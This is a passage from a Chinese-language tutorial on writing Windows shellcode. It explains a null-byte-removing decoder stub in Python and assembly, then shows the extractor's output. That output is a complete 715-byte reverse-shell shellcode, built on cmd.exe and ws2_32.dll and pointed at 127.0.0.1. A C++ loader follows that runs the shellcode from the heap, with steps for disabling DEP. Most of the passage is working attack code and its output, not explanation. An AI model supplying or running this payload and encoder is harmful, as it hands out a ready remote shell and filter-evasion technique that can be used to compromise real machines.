        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3C, missing_byte,                                 #   CMP AL, <missing byte>
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0xE2, 0xF6                                          #   LOOP loop1
                                                            # shellcode_begin:
    ]
 
    return ''.join([chr(x) for x in code]) + shellcode.replace('\0', chr(missing_byte))
複製代碼

逐字節地分析shellcode並瞭解下這是否爲被忽略的值，即從不出如今shellcode中的值。咱們來了解下值0x14.若是咱們用該值替換在shellcode中的每一個0x00，那麼shellcode將再也不含有null字節，可是會由於被修改了而沒法執行。最後是將一些decoder添加到shellcode，在運行時時，在原shellcode被執行前將重置null字節。以下：

CALL $ + 4                                  ; PUSH "here"; JMP "here"-1
here:
  (FF)C0 = INC EAX                            ; not important: just a NOP
  POP EDI                                     ; EDI = "here"
  MOV ECX, <xor value 1 for shellcode len>
  XOR ECX, <xor value 2 for shellcode len>    ; ECX = shellcode length
  ADD EDI, shellcode_begin - here             ; EDI = absolute address of original shellcode
  XOR ESI, ESI                                ; ESI = 0
  CLD                                         ; tells STOSB to go forwards
loop1:
  MOV AL, BYTE PTR [EDI]                      ; AL = current byte of the shellcode
  CMP AL, <missing byte>                      ; is AL the special byte?
  CMOVE EAX, ESI                              ; if AL is the special byte, then EAX = 0
  STOSB                                       ; overwrite the current byte of the shellcode with AL
  LOOP loop1                                  ; DEC ECX; if ECX > 0 then JMP loop1
shellcode_begin:
複製代碼

這裏有兩個須要重點討論的細節。首先，該代碼不能含有null字節，由於咱們須要另外一段代碼來移除他們

正如你看到的，CALL指令不會跳轉到here，由於操做碼（opcode）

E8 00 00 00 00               #   CALL here
複製代碼

包含四個null字節. 由於CALL 指令爲 5個字節, 因此CALL here指令等價於CALL $+5.除去null字節的技巧是使用指令 CALL $+4：

E8 FF FF FF FF               #   CALL $+4
複製代碼

那CALL跳過4個字節並jmp到CALL自己的最後一個FF。由字節C0緊接着CALL指令，所以在CALL指令執行以後該指令INC EAX對應的操做碼FF C0會被執行。注意CALL指令中已壓入棧的值仍然是here標記的絕對地址

這是除去null字節的第二種技巧：

MOV ECX, XOR ECX,

咱們能夠只是使用：

MOV ECX,

可是這將不會生成null字節。而實際上，shellcode的長度爲0x400，咱們將會看到該指令

B9 00 04 00 00 MOV ECX, 400h

存在3個null字節。

爲了不存在該問題，咱們選擇使用一個不會出如今00000400h中的non-null字節。咱們選擇使用0x01.如今咱們計算以下：

<xor value 1 for shellcode len> = 00000400h xor 01010101 = 01010501h
<xor value 2 for shellcode len> = 01010101h
複製代碼

在指令中使用<xor value 1 for shellcode len> 和 <xor value 2 for shellcode len>對應的操做碼都不存在null字節，而且在執行xor操做後，生成的原始值爲400h。

對應的兩條指令將會是：

B9 01 05 01 01        MOV ECX, 01010501h
81 F1 01 01 01 01     XOR ECX, 01010101h
複製代碼

經過函數 get_xor_values來計算xor值。

正如以上提到過的，該代碼很容易理解：經過逐字節檢查shellcode來用特定的值（0x14，在以前的範例中）覆寫null字節。

從shellcode中移除null字節(II)

如上的方法會失敗，由於咱們不能找到從不在shellcode中出現過的字節值。若是失敗了，咱們須要使用get_fixed_shellcode，可是它更爲複雜。

方法是將shellcode分爲多個254字節的塊。注意每一個塊必須存在一個「missing byte」，由於一個字節能夠具備255個非0值。咱們能夠對每一個塊進行逐個處理來爲每一個塊選擇missing byte。可是這樣作可能效率不高，由於對於一段具備254*N個字節的shellcode來講，咱們須要在shellcode（存在識別missing bytes的decoder）被處理以前或以後存儲N個「missing bytes」。最有效的作法是，爲儘量多個254字節的塊使用相同的「missing bytes」。咱們從shellcode的起始部分開始對塊進行處理，直處處理完最後一個塊。最後，咱們會有<missing_byte, num_blocks>配對的列表：

[(missing_byte1, num_blocks1), (missing_byte2, num_blocks2), ...]
複製代碼

我已決定將num_blocksX限制爲一個單一字節，所以，num_blocksX 的值會在1到255之間。

此處是get_fixed_shellcode部分，該部分將shellcode分爲多個塊。

def get_fixed_shellcode(shellcode):
    '''
    Returns a version of shellcode without null bytes. This version divides
    the shellcode into multiple blocks and should be used only if
    get_fixed_shellcode_single_block() doesn't work with this shellcode.
    '''
 
    # The format of bytes_blocks is
    #   [missing_byte1, number_of_blocks1,
    #    missing_byte2, number_of_blocks2, ...]
    # where missing_byteX is the value used to overwrite the null bytes in the
    # shellcode, while number_of_blocksX is the number of 254-byte blocks where
    # to use the corresponding missing_byteX.
    bytes_blocks = []
    shellcode_len = len(shellcode)
    i = 0
    while i < shellcode_len:
        num_blocks = 0
        missing_bytes = list(range(1, 256))
 
        # Tries to find as many 254-byte contiguous blocks as possible which misses at
        # least one non-null value. Note that a single 254-byte block always misses at
        # least one non-null value.
        while True:
            if i >= shellcode_len or num_blocks == 255:
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
            bytes = set([ord(c) for c in shellcode[i:i+254]])
            new_missing_bytes = [b for b in missing_bytes if b not in bytes]
            if len(new_missing_bytes) != 0:         # new block added
                missing_bytes = new_missing_bytes
                num_blocks += 1
                i += 254
            else:
                bytes += [missing_bytes[0], num_blocks]
                break
<snip>
複製代碼

就像以前，咱們須要討論在shellcode起始部分提早準備好的「decoder」。該decoder的代碼比以前的更長，可是原理相同。

這裏是代碼:

code = ([
    0xEB, len(bytes_blocks)] +                          #   JMP SHORT skip_bytes
                                                        # bytes:
    bytes_blocks + [                                    #   ...
                                                        # skip_bytes:
    0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                        # here:
    0xC0,                                               #   (FF)C0 = INC EAX
    0x5F,                                               #   POP EDI
    0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
    0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
    0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]
    0x83, 0xC7, 0x30,                                   #   ADD EDI, shellcode_begin - here
                                                        # loop1:
    0xB0, 0xFE,                                         #   MOV AL, 0FEh
    0xF6, 0x63, 0x01,                                   #   MUL AL, BYTE PTR [EBX+1]
    0x0F, 0xB7, 0xD0,                                   #   MOVZX EDX, AX
    0x33, 0xF6,                                         #   XOR ESI, ESI
    0xFC,                                               #   CLD
                                                        # loop2:
    0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
    0x3A, 0x03,                                         #   CMP AL, BYTE PTR [EBX]
    0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
    0xAA,                                               #   STOSB
    0x49,                                               #   DEC ECX
    0x74, 0x07,                                         #   JE shellcode_begin
    0x4A,                                               #   DEC EDX
    0x75, 0xF2,                                         #   JNE loop2
    0x43,                                               #   INC EBX
    0x43,                                               #   INC EBX
    0xEB, 0xE3                                          #   JMP loop1
                                                        # shellcode_begin:
])
複製代碼

bytes_blocks是數組：

[missing_byte1, num_blocks1, missing_byte2, num_blocks2, ...]
複製代碼

咱們在以前已經討論過，可是沒有配對。

注意代碼始於跳過bytes_blocks的JMP SHORT指令。爲了實現該操做，len(bytes_blocks)必須小於或等於0x7F。可是正如你所看到的，len(bytes_blocks) 也出如今另外一條指令中：

0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]
複製代碼

這裏要求len(bytes_blocks) 小於或等於0x7F – 5，所以這是決定性的條件。若是條件違規，則：

if len(bytes_blocks) > 0x7f - 5:
# Can't assemble "LEA EBX, [EDI + (bytes-here)]" or "JMP skip_bytes".
return None
複製代碼

進一步審計代碼：

JMP SHORT skip_bytes
bytes:
  ...
skip_bytes:
  CALL $ + 4                                  ; PUSH "here"; JMP "here"-1
here:
  (FF)C0 = INC EAX                            ; not important: just a NOP
  POP EDI                                     ; EDI = absolute address of "here"
  MOV ECX, <xor value 1 for shellcode len>
  XOR ECX, <xor value 2 for shellcode len>    ; ECX = shellcode length
  LEA EBX, [EDI + (bytes - here)]             ; EBX = absolute address of "bytes"
  ADD EDI, shellcode_begin - here             ; EDI = absolute address of the shellcode
loop1:
  MOV AL, 0FEh                                ; AL = 254
  MUL AL, BYTE PTR [EBX+1]                    ; AX = 254 * current num_blocksX = num bytes
  MOVZX EDX, AX                               ; EDX = num bytes of the current chunk
  XOR ESI, ESI                                ; ESI = 0
  CLD                                         ; tells STOSB to go forwards
loop2:
  MOV AL, BYTE PTR [EDI]                      ; AL = current byte of shellcode
  CMP AL, BYTE PTR [EBX]                      ; is AL the missing byte for the current chunk?
  CMOVE EAX, ESI                              ; if it is, then EAX = 0
  STOSB                                       ; replaces the current byte of the shellcode with AL
  DEC ECX                                     ; ECX -= 1
  JE shellcode_begin                          ; if ECX == 0, then we're done!
  DEC EDX                                     ; EDX -= 1
  JNE loop2                                   ; if EDX != 0, then we keep working on the current chunk
  INC EBX                                     ; EBX += 1  (moves to next pair...
  INC EBX                                     ; EBX += 1   ... missing_bytes, num_blocks)
  JMP loop1                                   ; starts working on the next chunk
shellcode_begin:
複製代碼

測試腳本

這部分會簡明易懂！若是沒有任何參數，運行腳本將會顯示以下：

Shellcode Extractor by Massimiliano Tomassoli (2015)

Usage:
  sce.py <exe file> <map file>
複製代碼

若是你還記得，咱們也已經告訴過VS 2013 的linker生成一個映射文件。只調用具備exe文件及映射文件路徑的腳本。此處是從反向shellcode中獲得的信息：

Shellcode Extractor by Massimiliano Tomassoli (2015)

Extracting shellcode length from "mapfile"...
shellcode length: 614
Extracting shellcode from "shellcode.exe" and analyzing relocations...
Found 3 reference(s) to 3 string(s) in .rdata
Strings:
  ws2_32.dll
  cmd.exe
  127.0.0.1

Fixing the shellcode...
final shellcode length: 715

char shellcode[] =
"\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xa8\x03\x01\x01\x81\xf1\x01\x01"
"\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
"\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x7b\x02\x05\x05"
"\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83"
"\xe4\xf8\x81\xec\x24\x02\x05\x05\x53\x56\x57\xb9\x8d\x10\xb7\xf8"
"\xe8\xa5\x01\x05\x05\x68\x87\x02\x05\x05\xff\xd0\xb9\x40\xd5\xdc"
"\x2d\xe8\x94\x01\x05\x05\xb9\x6f\xf1\xd4\x9f\x8b\xf0\xe8\x88\x01"
"\x05\x05\xb9\x82\xa1\x0d\xa5\x8b\xf8\xe8\x7c\x01\x05\x05\xb9\x70"
"\xbe\x1c\x23\x89\x44\x24\x18\xe8\x6e\x01\x05\x05\xb9\xd1\xfe\x73"
"\x1b\x89\x44\x24\x0c\xe8\x60\x01\x05\x05\xb9\xe2\xfa\x1b\x01\xe8"
"\x56\x01\x05\x05\xb9\xc9\x53\x29\xdc\x89\x44\x24\x20\xe8\x48\x01"
"\x05\x05\xb9\x6e\x85\x1c\x5c\x89\x44\x24\x1c\xe8\x3a\x01\x05\x05"
"\xb9\xe0\x53\x31\x4b\x89\x44\x24\x24\xe8\x2c\x01\x05\x05\xb9\x98"
"\x94\x8e\xca\x8b\xd8\xe8\x20\x01\x05\x05\x89\x44\x24\x10\x8d\x84"
"\x24\xa0\x05\x05\x05\x50\x68\x02\x02\x05\x05\xff\xd6\x33\xc9\x85"
"\xc0\x0f\x85\xd8\x05\x05\x05\x51\x51\x51\x6a\x06\x6a\x01\x6a\x02"
"\x58\x50\xff\xd7\x8b\xf0\x33\xff\x83\xfe\xff\x0f\x84\xc0\x05\x05"
"\x05\x8d\x44\x24\x14\x50\x57\x57\x68\x9a\x02\x05\x05\xff\x54\x24"
"\x2c\x85\xc0\x0f\x85\xa8\x05\x05\x05\x6a\x02\x57\x57\x6a\x10\x8d"
"\x44\x24\x58\x50\x8b\x44\x24\x28\xff\x70\x10\xff\x70\x18\xff\x54"
"\x24\x40\x6a\x02\x58\x66\x89\x44\x24\x28\xb8\x05\x7b\x05\x05\x66"
"\x89\x44\x24\x2a\x8d\x44\x24\x48\x50\xff\x54\x24\x24\x57\x57\x57"
"\x57\x89\x44\x24\x3c\x8d\x44\x24\x38\x6a\x10\x50\x56\xff\x54\x24"
"\x34\x85\xc0\x75\x5c\x6a\x44\x5f\x8b\xcf\x8d\x44\x24\x58\x33\xd2"
"\x88\x10\x40\x49\x75\xfa\x8d\x44\x24\x38\x89\x7c\x24\x58\x50\x8d"
"\x44\x24\x5c\xc7\x84\x24\x88\x05\x05\x05\x05\x01\x05\x05\x50\x52"
"\x52\x52\x6a\x01\x52\x52\x68\x92\x02\x05\x05\x52\x89\xb4\x24\xc0"
"\x05\x05\x05\x89\xb4\x24\xbc\x05\x05\x05\x89\xb4\x24\xb8\x05\x05"
"\x05\xff\x54\x24\x34\x6a\xff\xff\x74\x24\x3c\xff\x54\x24\x18\x33"
"\xff\x57\xff\xd3\x5f\x5e\x33\xc0\x5b\x8b\xe5\x5d\xc3\x33\xd2\xeb"
"\x10\xc1\xca\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0"
"\x41\x8a\x01\x84\xc0\x75\xea\x8b\xc2\xc3\x55\x8b\xec\x83\xec\x14"
"\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b"
"\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8d\x47\xf8"
"\x8b\x3f\x8b\x70\x18\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
"\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x9e\xff\xff\xff\x8b"
"\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xc0\x89\x4d\xf0\x89\x45\xfc"
"\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x7d\xff\xff\xff"
"\x03\x45\xf8\x39\x45\xf4\x74\x1e\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
"\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\xa0\x33\xc0\x5f"
"\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48"
"\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6"
"\xeb\xdd\x2f\x05\x05\x05\xf2\x05\x05\x05\x80\x01\x05\x05\x77\x73"
"\x32\x5f\x33\x32\x2e\x64\x6c\x6c\x05\x63\x6d\x64\x2e\x65\x78\x65"
"\x05\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x05";
複製代碼

重點在於重定位信息，由於能夠根據它來檢查一切是否OK。例如，咱們瞭解到反向shell使用3個字符串來實現，而且它們是從.rdata節中提取的。咱們能夠了解到原始shellcode爲614個字節，同時也瞭解到已生成的shellcode（在處理了重定向信息以及null字節以後）爲715字節。

如今須要運行已生成的shellcode。此處是完整的源碼：

#include <cstring>
#include <cassert>
 
// Important: Disable DEP!
//  (Linker->Advanced->Data Execution Prevention = NO)
 
void main() {
    char shellcode[] =
        "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xa8\x03\x01\x01\x81\xf1\x01\x01"
        "\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
        "\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x7b\x02\x05\x05"
        "\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83"
        "\xe4\xf8\x81\xec\x24\x02\x05\x05\x53\x56\x57\xb9\x8d\x10\xb7\xf8"
        "\xe8\xa5\x01\x05\x05\x68\x87\x02\x05\x05\xff\xd0\xb9\x40\xd5\xdc"
        "\x2d\xe8\x94\x01\x05\x05\xb9\x6f\xf1\xd4\x9f\x8b\xf0\xe8\x88\x01"
        "\x05\x05\xb9\x82\xa1\x0d\xa5\x8b\xf8\xe8\x7c\x01\x05\x05\xb9\x70"
        "\xbe\x1c\x23\x89\x44\x24\x18\xe8\x6e\x01\x05\x05\xb9\xd1\xfe\x73"
        "\x1b\x89\x44\x24\x0c\xe8\x60\x01\x05\x05\xb9\xe2\xfa\x1b\x01\xe8"
        "\x56\x01\x05\x05\xb9\xc9\x53\x29\xdc\x89\x44\x24\x20\xe8\x48\x01"
        "\x05\x05\xb9\x6e\x85\x1c\x5c\x89\x44\x24\x1c\xe8\x3a\x01\x05\x05"
        "\xb9\xe0\x53\x31\x4b\x89\x44\x24\x24\xe8\x2c\x01\x05\x05\xb9\x98"
        "\x94\x8e\xca\x8b\xd8\xe8\x20\x01\x05\x05\x89\x44\x24\x10\x8d\x84"
        "\x24\xa0\x05\x05\x05\x50\x68\x02\x02\x05\x05\xff\xd6\x33\xc9\x85"
        "\xc0\x0f\x85\xd8\x05\x05\x05\x51\x51\x51\x6a\x06\x6a\x01\x6a\x02"
        "\x58\x50\xff\xd7\x8b\xf0\x33\xff\x83\xfe\xff\x0f\x84\xc0\x05\x05"
        "\x05\x8d\x44\x24\x14\x50\x57\x57\x68\x9a\x02\x05\x05\xff\x54\x24"
        "\x2c\x85\xc0\x0f\x85\xa8\x05\x05\x05\x6a\x02\x57\x57\x6a\x10\x8d"
        "\x44\x24\x58\x50\x8b\x44\x24\x28\xff\x70\x10\xff\x70\x18\xff\x54"
        "\x24\x40\x6a\x02\x58\x66\x89\x44\x24\x28\xb8\x05\x7b\x05\x05\x66"
        "\x89\x44\x24\x2a\x8d\x44\x24\x48\x50\xff\x54\x24\x24\x57\x57\x57"
        "\x57\x89\x44\x24\x3c\x8d\x44\x24\x38\x6a\x10\x50\x56\xff\x54\x24"
        "\x34\x85\xc0\x75\x5c\x6a\x44\x5f\x8b\xcf\x8d\x44\x24\x58\x33\xd2"
        "\x88\x10\x40\x49\x75\xfa\x8d\x44\x24\x38\x89\x7c\x24\x58\x50\x8d"
        "\x44\x24\x5c\xc7\x84\x24\x88\x05\x05\x05\x05\x01\x05\x05\x50\x52"
        "\x52\x52\x6a\x01\x52\x52\x68\x92\x02\x05\x05\x52\x89\xb4\x24\xc0"
        "\x05\x05\x05\x89\xb4\x24\xbc\x05\x05\x05\x89\xb4\x24\xb8\x05\x05"
        "\x05\xff\x54\x24\x34\x6a\xff\xff\x74\x24\x3c\xff\x54\x24\x18\x33"
        "\xff\x57\xff\xd3\x5f\x5e\x33\xc0\x5b\x8b\xe5\x5d\xc3\x33\xd2\xeb"
        "\x10\xc1\xca\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0"
        "\x41\x8a\x01\x84\xc0\x75\xea\x8b\xc2\xc3\x55\x8b\xec\x83\xec\x14"
        "\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b"
        "\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8d\x47\xf8"
        "\x8b\x3f\x8b\x70\x18\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
        "\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x9e\xff\xff\xff\x8b"
        "\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xc0\x89\x4d\xf0\x89\x45\xfc"
        "\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x7d\xff\xff\xff"
        "\x03\x45\xf8\x39\x45\xf4\x74\x1e\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
        "\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\xa0\x33\xc0\x5f"
        "\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48"
        "\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6"
        "\xeb\xdd\x2f\x05\x05\x05\xf2\x05\x05\x05\x80\x01\x05\x05\x77\x73"
        "\x32\x5f\x33\x32\x2e\x64\x6c\x6c\x05\x63\x6d\x64\x2e\x65\x78\x65"
        "\x05\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x05";
 
    static_assert(sizeof(shellcode) > 4, "Use 'char shellcode[] = ...' (not 'char *shellcode = ...')");
 
    // We copy the shellcode to the heap so that it's in writeable memory and can modify itself.
    char *ptr = new char[sizeof(shellcode)];
    memcpy(ptr, shellcode, sizeof(shellcode));
    ((void(*)())ptr)();
}
複製代碼

此時須要關閉DEP（Data Execution Prevention)來讓該段代碼成功地被執行，經過Project→<solution name> Properties 而後在 Configuration Properties下, Linker and Advanced, 將 Data Execution Prevention (DEP) 設爲 No (/NXCOMPAT:NO)。由於shellcode將會在堆中被執行，因此開啓了DEP會致使shellcode沒法被執行。

C++11 (所以須要VS 2013 CTP )標準中介紹了static_assert ，使用以下語句來檢查